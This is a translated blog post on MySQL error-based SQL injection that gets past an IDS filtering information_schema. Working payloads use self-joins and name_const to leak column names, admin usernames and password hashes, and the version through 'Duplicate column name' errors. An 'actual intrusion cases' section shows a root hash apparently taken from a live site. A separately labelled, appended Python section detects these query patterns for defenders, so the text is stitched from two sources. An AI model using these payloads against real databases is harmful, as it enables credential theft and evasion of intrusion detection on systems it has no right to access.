Bypassing an IDS that filters information_schema so that the injection can continue.

Source: Internet
Author: User

Original article: Bypassing an IDS that filters information_schema to continue the injection

// Use MySQL error messages to expose column names

mysql> select * from (select * from user a join user b) c;
ERROR 1060 (42S21): Duplicate column name 'host'

mysql> select * from (select * from user a join user b using (host)) c;
ERROR 1060 (42S21): Duplicate column name 'user'

mysql> select * from (select * from user a join user b using (host, user)) c;
ERROR 1060 (42S21): Duplicate column name 'password'
 
// Obtain information

// This may be a version problem; I could not get it to work.

mysql> select name_const((select host from user limit 0,1), 0);
ERROR 1210 (HY000): Incorrect arguments to NAME_CONST

It seems that the arguments to name_const must be constants.

To be tried again another time.

Update: it is clearly a version problem (in higher versions both arguments must be constants, otherwise an error is reported), so this method does not seem very portable.
 
mysql> select version();
+---------------------+
| version()           |
+---------------------+
| 5.0.27-community-nt |
+---------------------+
1 row in set (0.00 sec)

mysql> select name_const((select user()), 0);
+----------------+
| root@localhost |
+----------------+
|              0 |
+----------------+
1 row in set (0.00 sec)

---

mysql> select version();
+------------------+
| version()        |
+------------------+
| 5.1.35-community |
+------------------+
1 row in set (0.00 sec)

mysql> select name_const((select version()), 0);
ERROR 1210 (HY000): Incorrect arguments to NAME_CONST
 
When I was doing a penetration test, I came across a website where the IDS filtered information_schema, and as a result I could not get any further at the time. The day before yesterday I read the article above and found a bypass method. I tested it locally, discussed it with yuanniu as well, and finally constructed the statements with yuanniu's help. I then went back and took another look at it, and now that my brother has released the method, let's publish it.
 
1. Construct a local test table

mysql> create table users (id int, name varchar(20), passwd varchar(32));
Query OK, 0 rows affected (0.04 sec)

mysql> insert into users values (1, 'mickey', '827ccb0eea8a706c4c34a16891f84e7b');
Query OK, 1 row affected (0.00 sec)

mysql> create table news (is_admin int(1), id int(2), title varchar(100), date date);
Query OK, 0 rows affected (0.00 sec)

mysql> insert into news values (1, 1, 'hello, mickey', now());
Query OK, 1 row affected, 1 warning (0.00 sec)
 
2. Brute-forcing column names

mysql> select * from (select * from users as a join news as b) as c;
ERROR 1060 (42S21): Duplicate column name 'id'

mysql> select * from (select * from users a join users b using (id)) c;
ERROR 1060 (42S21): Duplicate column name 'name'

mysql> select * from (select * from users a join users b using (id, name)) c;
ERROR 1060 (42S21): Duplicate column name 'passwd'

mysql> select * from (select * from users a join users b using (id, name, passwd)) c;
+------+--------+----------------------------------+
| id   | name   | passwd                           |
+------+--------+----------------------------------+
|    1 | mickey | 827ccb0eea8a706c4c34a16891f84e7b |
+------+--------+----------------------------------+
1 row in set (0.00 sec)

mysql> select * from (select * from news a join news b using (id)) as c;
ERROR 1060 (42S21): Duplicate column name 'is_admin'

mysql> select * from (select * from news a join news b using (id, is_admin)) as c;
ERROR 1060 (42S21): Duplicate column name 'title'

mysql> select * from (select * from news a join news b using (id, is_admin, title)) as c;
ERROR 1060 (42S21): Duplicate column name 'date'

mysql> select * from (select * from news a join news b using (id, is_admin, title, date)) as c;
+----------+------+---------------+------------+
| is_admin | id   | title         | date       |
+----------+------+---------------+------------+
|        1 |    1 | hello, mickey | 2010-05-08 |
+----------+------+---------------+------------+
1 row in set (0.00 sec)
 
3. Brute-forcing field values (this statement was constructed by yuanniu)

Brute-force statement:

select * from cms_votes where vid = 1 and exists
(select * from (select name_const((select group_concat(concat(uid, 0x7c, pwd)) from admin), 'fuck') a
 join (select name_const((select group_concat(concat(uid, 0x7c, pwd)) from admin), 'fuck') b) c);

Applied:

mysql> select * from cms_votes where vid = 1 and exists
    -> (select * from (select name_const((select group_concat(concat(uid, 0x7c, pwd)) from admin), 'fuck') a
    -> join (select name_const((select group_concat(concat(uid, 0x7c, pwd)) from admin), 'fuck') b) c);
ERROR 1060 (42S21): Duplicate column name 'ylbhz|fuck,mickey|fucked'

mysql> select * from cms_votes where vid = 1 and exists
    -> (select * from (select name_const(@@version, 0)) a
    -> join (select name_const(@@version, 0)) b) c);
ERROR 1060 (42S21): Duplicate column name '5.0.45-community-nt'
 
4. Actual intrusion cases

Error: Duplicate column name '5.0.27-community-nt'

Error: Duplicate column name 'root*b7b1a4f45d9e638faeb750f0a99935634cff6c82'
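As an added example (not from the original article), a small Python detector for the defender's side: it flags the query shapes the article relies on, which a rule that only matches information_schema would miss, and checks whether a response body echoes the 1060 error text that makes this error-based leak possible. The sample queries are constructed, and the indicator names and functions are my own.

```python
import re

# Constructed sample query strings (not from the original page), as a general
# query log or a WAF request log might record them.
SAMPLE_QUERIES = [
    "select * from cms_votes where vid = 1",
    "select * from cms_votes where vid = 1 and exists (select * from "
    "(select name_const((select group_concat(concat(uid,0x7c,pwd)) from admin),'x') a "
    "join (select name_const((select group_concat(concat(uid,0x7c,pwd)) from admin),'x') b) c)",
    "select * from (select * from users a join users b using (id, name)) c",
    "select table_name from information_schema.tables",
    "select name_const(@@version, 0)",
]

# Indicator patterns covering the error-based path the article shows, so a rule
# set that only matched 'information_schema' no longer misses it.
INDICATORS = {
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "name_const": re.compile(r"\bname_const\s*\(", re.I),
    # a derived table that self-joins with USING is the column-name oracle
    "derived_self_join_using": re.compile(
        r"\(\s*select\s+\*\s+from\s+(\w+)\s+(?:as\s+)?\w+\s+join\s+\1\b[^)]*?\busing\s*\(",
        re.I),
    "exists_subselect": re.compile(r"\bexists\s*\(\s*select\b", re.I),
    "version_probe": re.compile(r"@@version\b|\bversion\s*\(\s*\)", re.I),
}


def classify_query(sql: str) -> list[str]:
    """Return the names of all indicators matched by one query string."""
    return [name for name, rx in INDICATORS.items() if rx.search(sql)]


def response_leaks_error(body: str) -> bool:
    """True when a response body relays the MySQL 1060 error text to the
    client, i.e. the application is exposing database errors."""
    return re.search(r"duplicate column name\s*'", body, re.I) is not None


def scan(queries) -> dict[str, list[str]]:
    """Map each suspicious query to its indicators; clean queries are omitted."""
    return {q: hits for q in queries if (hits := classify_query(q))}
```

Suppressing the raw error text in the application response removes the channel these statements depend on, whether or not the queries themselves are blocked.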
 
Finally, I would like to thank Mo NIU for the guidance.
 